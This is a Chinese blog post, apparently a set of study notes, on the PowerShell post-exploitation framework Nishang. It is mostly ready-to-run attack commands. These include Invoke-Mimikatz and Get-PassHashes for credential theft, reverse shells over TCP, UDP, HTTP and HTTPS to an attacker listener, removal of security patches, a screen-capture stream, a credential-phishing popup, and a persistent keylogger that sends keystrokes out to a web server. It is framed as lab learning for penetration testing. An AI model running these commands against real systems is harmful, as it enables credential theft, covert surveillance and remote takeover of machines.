Nishang 学习笔记
微信公众号:乌鸦安全
扫取二维码获取更多信息!
1. 介绍
Nishang
是一款针对PowerShell
的后渗透工具。
下载地址:
https://github.com/samratashok/nishang
以下内容为学习资料整理,参考链接如下:
https://blog.csdn.net/weixin_40412037/article/details/115510209https://zhuanlan.zhihu.com/p/27723026https://pingmaoer.github.io/2020/04/08/PowerShell-Nishang/
2. 结构
上面三图为参考图!
3. 模块加载
在官网文档中,启用的操作是这样的:
Import-Module .\nishang.psm1
运行的时候提示 系统禁止运行脚本
这时候执行:
set-ExecutionPolicy RemoteSigned
提示需要以管理员的权限来运行powershell
,那就用管理员权限启动:
初次导入,会有红色字的警告提示,如上图所示,是因为windows官方做的一个安全策略导致,再次使用 set-ExecutionPolicy RemoteSigned
然后再次导入
Import-Module .\nishang.psm1
忽略警告即可!
4. 使用
4.1 获取所有模块
Get-Command -Module nishang
查看nishang
的所有模块:
4.2 获取计算机信息
Get-Information:获取常规计算机信息
4.3 检查虚拟机
Check-VN
检测是否是虚拟机版本:
4.4 端口扫描
Invoke-PortScan -StartAddress 10.211.55.0 -EndAddress 10.211.55.255 -ResolveHost -ScanPort
4.5 获取计算机密码
Invoke-Mimikatz
4.6 反弹shell
Invoke-PowershellTcp -Reverse -IPAddress x.x.x.x -Port xxxx
nc -lvvp xxxx
反弹tcp协议Invoke-Powershelludp -Reverse -IPAddress x.x.x.x -port xxxx
nc -lup xxxx
反弹udp协议Invoke-PoshRatHttp -IPAddress x.x.x.x -Port xxxx
反弹http协议Invoke-PoshRatHttps -IPAddress x.x.x.x -Port xxxx
反弹https协议
在kali
上进行如下监听: nc -lvvp 6666
反弹shell
到kali
上:
Invoke-PowerShellTcp -Reverse -IPAddress 10.211.55.23 -Port 6666
反弹成功!
4.7 删除补丁
systeminfo
查看所有的信息
Remove-Update KB4580346
删除某一个补丁
4.8 屏幕监控
靶机:Show-TargetScreen -Reverse -IPAddress x.x.x.x -Port xxxx
攻击机:netcat -nlvp xxxx | netcat -nlvp yyyy
URL访问攻击机 IP: yyyy
在kali
上执行: netcat -nlvp 6666 | netcat -nlvp 7788
将接收的6666
的流量转发到7788
上去
在靶机上执行:
Show-TargetScreen -Reverse -IPAddress 10.211.55.23 -Port 6666
此时访问kali
上的7788
端口:
4.9 强迫用户输入密码凭据
Invoke-CredentialsPhish
关闭的时候是关不掉的,只能输入密码,而且如果输入了错误的密码,还会弹出来,当然可以通过任务管理器关掉这个进程。我自己的电脑密码记不得了,所以只能强制关掉进程。
4.10 键盘记录
cd .\Gather\
切换目录
Get-Help .Keylogger.ps1 -full
PS >.\Keylogger.ps1 #使用这种方式运行,键盘记录会保存在当前用户Temp目录下的Key文件中PS >.\Keylogger.ps1 -CheckURL http://pastebin.com/raw.php?i=jqP2vJ3x -MagicString stopthis #-CheckURL参数会检查所给出的网页之中是否包含 -MagicString后的字符串,如果存在就停止使用记录PS >.\Keylogger.ps1 -CheckURL http://pastebin.com/raw.php?i=jqP2vJ3x -MagicString stopthis -exfil -ExfilOption WebServer -URL http://192.168.254.226/data/catch.php #将记录指定发送给一个可以记录Post请求的web服务器PS >.\Keylogger.ps1 -persist # 实现持久化记录(重启后依然进行记录)
.\Keylogger.ps1
这里面需要配置下才可以
然后结果会记录在Temp
目录下的key.log
文件:
Parse_Keys "C:\Users\crow\AppData\Local\Temp\key.log" "C:\Users\crow\AppData\Local\Temp\000.txt"
将文件进行解析
4.11 获取hash
Get-PassHashes
5. 总结
Nishang
是基于PowerShell
的后渗透测试专用工具,这里面有非常多的命令可以调用,虽然大部分情况存在av的情况下无法直接执行PowerShell
,但是代码的思路值得我们学习!本文只列举了部分功能,全部功能各位师傅可以参考作者的说明文档!
扫取二维码获取更多信息!
Nishang 学习笔记相关推荐
- OSCP学习笔记总结(本资料禁止转载)
OSCP学习笔记 一.侦查与枚举 1.渗透日志记录 script target.log 2.端口扫描 (1)Nmap nmap -sS -Pn -n -A x.x.x.x 不重试扫描所有udp端口 n ...
- PyTorch 学习笔记(六):PyTorch hook 和关于 PyTorch backward 过程的理解 call
您的位置 首页 PyTorch 学习笔记系列 PyTorch 学习笔记(六):PyTorch hook 和关于 PyTorch backward 过程的理解 发布: 2017年8月4日 7,195阅读 ...
- 容器云原生DevOps学习笔记——第三期:从零搭建CI/CD系统标准化交付流程
暑期实习期间,所在的技术中台-效能研发团队规划设计并结合公司开源协同实现符合DevOps理念的研发工具平台,实现研发过程自动化.标准化: 实习期间对DevOps的理解一直懵懵懂懂,最近观看了阿里专家带 ...
- 容器云原生DevOps学习笔记——第二期:如何快速高质量的应用容器化迁移
暑期实习期间,所在的技术中台-效能研发团队规划设计并结合公司开源协同实现符合DevOps理念的研发工具平台,实现研发过程自动化.标准化: 实习期间对DevOps的理解一直懵懵懂懂,最近观看了阿里专家带 ...
- 2020年Yann Lecun深度学习笔记(下)
2020年Yann Lecun深度学习笔记(下)
- 2020年Yann Lecun深度学习笔记(上)
2020年Yann Lecun深度学习笔记(上)
- 知识图谱学习笔记(1)
知识图谱学习笔记第一部分,包含RDF介绍,以及Jena RDF API使用 知识图谱的基石:RDF RDF(Resource Description Framework),即资源描述框架,其本质是一个 ...
- 计算机基础知识第十讲,计算机文化基础(第十讲)学习笔记
计算机文化基础(第十讲)学习笔记 采样和量化PictureElement Pixel(像素)(链接: 采样的实质就是要用多少点(这个点我们叫像素)来描述一张图像,比如,一幅420x570的图像,就表示 ...
- Go 学习推荐 —(Go by example 中文版、Go 构建 Web 应用、Go 学习笔记、Golang常见错误、Go 语言四十二章经、Go 语言高级编程)
Go by example 中文版 Go 构建 Web 应用 Go 学习笔记:无痕 Go 标准库中文文档 Golang开发新手常犯的50个错误 50 Shades of Go: Traps, Gotc ...
最新文章
- 亚里士多德千年前的猜想,被这群MIT本科生向前推进了一步
- 开源跨平台移动项目Ngui【Action动作系统】
- Linux 内核完成 urb: 完成回调处理者
- 使用python进行utf9编码和解码
- python-2:工欲善其事,必先利其器 修改jupyter保存文件目录(亲测)
- hdu 6194 后缀数组
- java c3p0获取主键_Tomcatc3p0配置jnid数据源2种实现方法解析
- 修改内核的启动logo
- 系统相机裁剪比例_拍不出好照片,你缺的不是好手机而是相机设置的秘笈
- leetcode —— 6. Z 字形变换
- 【安全】Ceotos 7.5.1804 安装openldap 2.4.44
- Excel中 使用链接 批量导入图片
- 【习题基础知识】输入与输出、简单循环(好多图贴上去好累...要看图的话我把word文档发给你)...
- charles+https+安卓7.0+夜神模拟器,解决安卓7.0+版本https无法抓包问题
- 爬取全国12个热门城市奶茶店铺情况,看看你的城市哪个品牌最多
- ios 博客及论坛整理
- CAJViwer安装提示:请求的操作需要提升
- java中检测鼠标_java – 在屏幕上检测鼠标移动
- 动态规划-规划兼职工作
- 前端必会的anime动画库
热门文章
- 快速上手 github
- c语言画爱心 带字,如何用C语言画一个心形
- 毛哥的快乐生活(29) 大河弯弯
- 【智力题】有 1000 瓶药物,但是其中有一瓶是有毒的,小白鼠吃了一个星期以后就会死掉!请问,在一个星期内找出有毒的 药物,最少需要多少只小白鼠?
- Eureka进行服务调用服务报 java.lang.IllegalStateException: No instances available for XXXX 异常的解决方案。附上完整的代码案例
- 航空1553接口测试工装研究
- spring源码下载编译
- 逻辑回归模型预测股票涨跌
- burp suite实现映客直播下载
- 汽车碳中和,一场不仅关乎CO₂的博弈